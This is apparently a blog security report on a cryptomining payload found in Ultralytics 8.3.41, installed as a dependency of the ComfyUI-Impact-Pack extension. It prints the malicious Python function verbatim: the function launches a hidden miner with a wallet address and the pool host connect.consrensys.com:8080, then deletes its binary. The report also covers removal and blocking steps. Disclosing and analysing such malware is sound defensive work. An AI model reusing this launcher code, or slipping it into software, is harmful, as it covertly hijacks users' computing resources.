Potential Cryptocurrency Mining Attack Report: Security Issues in ComfyUI and Ultralytics

Overview

Recently, unauthorized cryptocurrency mining activity was suspected while using ComfyUI with the ComfyUI-Impact-Pack extension. The issue originates from malicious Python code in the Ultralytics package, which attempts to use system resources for unauthorized mining operations.

Potential Cryptocurrency Mining Attack Report: Security Issues in ComfyUI and Ultralytics

Problem Description

The incident involves a downloaded module located at the following path (downloads.py): YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils

Malicious Code Sample

The following malicious code was detected:

def safe_run(path):
    os.chmod(path, 0o770)
    command = [
        path,
        '-u',
        '4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
        '-o',
        'connect.consrensys.com:8080',
        '-k'
    ]
    process = subprocess.Popen(
        command,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        preexec_fn=os.setsid,
        close_fds=True
    )
    os.remove(path)

Behavior Analysis

  1. Permission Change: Uses os.chmod to make the file executable.
  2. Executing Malicious Commands: Connects to the mining pool server connect.consrensys.com:8080.
  3. Process Hiding: Suppresses input, output, and error streams to avoid detection.
  4. File Removal: Deletes the file after execution to hide evidence.

Risk Assessment

Potential Impacts

  • High System Resource Usage: Mining significantly increases CPU/GPU load.
  • Hardware Wear: Prolonged high usage may shorten hardware lifespan.
  • Security Risks: Could endanger sensitive data or overall system security.

Source of the Issue

This malicious activity is linked to a suspicious version of the Ultralytics package, which appears to be installed as an automatic dependency of ComfyUI-Impact-Pack.

Installation Path

  • Suspicious Package: Ultralytics version 8.3.41
  • Location: YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics

Trigger

Likely triggered by the install.py script in ComfyUI-Impact-Pack, which auto-installs dependencies.


Network Behavior Analysis

Target Domain

  • Domain Name: connect.consrensys.com
  • Port: 8080
  • Purpose: Suspected mining pool endpoint, likely using the Stratum protocol.

Evidence

  • Explicit mining pool connection details in the script.
  • Use of a private key (e.g., 4BHRQHF...) indicates active mining account or operation.

  1. Uninstall Suspicious Packages
    pip uninstall ultralytics ultralytics-thop
    
  2. Remove ComfyUI-Impact-Pack Delete related directory:
    ./ComfyUI/custom_nodes/ComfyUI-Impact-Pack
    
  3. Scan Your System Use antivirus software and malware detection tools to ensure no ongoing threats.

  4. Monitor Network Connections Check for external connections to connect.consrensys.com and block it in the firewall.

  5. Raise Awareness Share this report with the maintainers of ComfyUI and Ultralytics to prevent further abuse.

Additional Evidence

  • Code Location: YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils/downloads.py
  • Behavior Pattern: Unauthorized file execution, mining pool connection, and evidence cleaning.
  • Trigger Condition: Automatic dependency installation by ComfyUI-Impact-Pack.

References

Conclusion

This incident highlights the risks of insufficient dependency review in open-source projects, which can expose users’ systems to malicious attacks. The open-source community should adopt stricter review mechanisms to protect end-users.


Share on:
Previous: A New Era of Speech Synthesis: Fish Speech 1.5 Adds Five New Languages for Seamless Real-Time Conversations!
Next: World Labs: A New Revolution in AI-Generated 3D Interactive Worlds
DMflow.chat

DMflow.chat

ad

DMflow.chat: Your all-in-one solution for integrated communication. Enjoy multi-platform support, persistent memory, customizable fields, effortless database and form connections, interactive web pages, and API data export—all in one seamless package.

7-Day Limited Offer! Windsurf AI Launches Free Unlimited GPT-4.1 Trial — Experience Top-Tier AI Now!
16 April 2025

7-Day Limited Offer! Windsurf AI Launches Free Unlimited GPT-4.1 Trial — Experience Top-Tier AI Now!

7-Day Limited Offer! Windsurf AI Launches Free Unlimited GPT-4.1 Trial — Experience Top-Tier AI N...

Eavesdropping on Dolphins? Google’s AI Tool DolphinGemma Unlocks Secrets of Marine Communication
16 April 2025

Eavesdropping on Dolphins? Google’s AI Tool DolphinGemma Unlocks Secrets of Marine Communication

Eavesdropping on Dolphins? Google’s AI Tool DolphinGemma Unlocks Secrets of Marine Communication ...

WordPress Goes All-In! Build Your Website with a Single Sentence? Say Goodbye to Website Woes with the AI Assistant!
11 April 2025

WordPress Goes All-In! Build Your Website with a Single Sentence? Say Goodbye to Website Woes with the AI Assistant!

WordPress Goes All-In! Build Your Website with a Single Sentence? Say Goodbye to Website Woes wit...

The Great AI Agent Alliance Begins! Google Launches Open-Source A2A Protocol, Ushering in a New Era of Seamless Collaboration
10 April 2025

The Great AI Agent Alliance Begins! Google Launches Open-Source A2A Protocol, Ushering in a New Era of Seamless Collaboration

The Great AI Agent Alliance Begins! Google Launches Open-Source A2A Protocol, Ushering in a New E...

Llama 4 Leaked Training? Meta Exec Denies Cheating Allegations, Exposes the Grey Zone of AI Model Development
8 April 2025

Llama 4 Leaked Training? Meta Exec Denies Cheating Allegations, Exposes the Grey Zone of AI Model Development

Llama 4 Leaked Training? Meta Exec Denies Cheating Allegations, Exposes the Grey Zone of AI Model...

Meta Drops a Bombshell! Open-Source Llama 4 Multimodal AI Arrives, Poised to Challenge GPT-4 with Shocking Performance!
6 April 2025

Meta Drops a Bombshell! Open-Source Llama 4 Multimodal AI Arrives, Poised to Challenge GPT-4 with Shocking Performance!

Meta Drops a Bombshell! Open-Source Llama 4 Multimodal AI Arrives, Poised to Challenge GPT-4 with...

Anthropic Launches Revolutionary AI Assistant: Claude Now Controls Computers Autonomously, Ushering in a New Era of AI
23 October 2024

Anthropic Launches Revolutionary AI Assistant: Claude Now Controls Computers Autonomously, Ushering in a New Era of AI

Anthropic Launches Revolutionary AI Assistant: Claude Now Controls Computers Autonomously, Usheri...

TikTok's Massive Layoffs: The Dawn of AI Content Moderation Era Affects Hundreds of Global Employees
23 October 2024

TikTok's Massive Layoffs: The Dawn of AI Content Moderation Era Affects Hundreds of Global Employees

TikTok’s Massive Layoffs: The Dawn of AI Content Moderation Era Affects Hundreds of Global Employ...

Zapier Launches MCP: A New Era of AI-Powered Automation
25 March 2025

Zapier Launches MCP: A New Era of AI-Powered Automation

Zapier Launches MCP: A New Era of AI-Powered Automation AI Assistants Are No Longer Just Chatbot...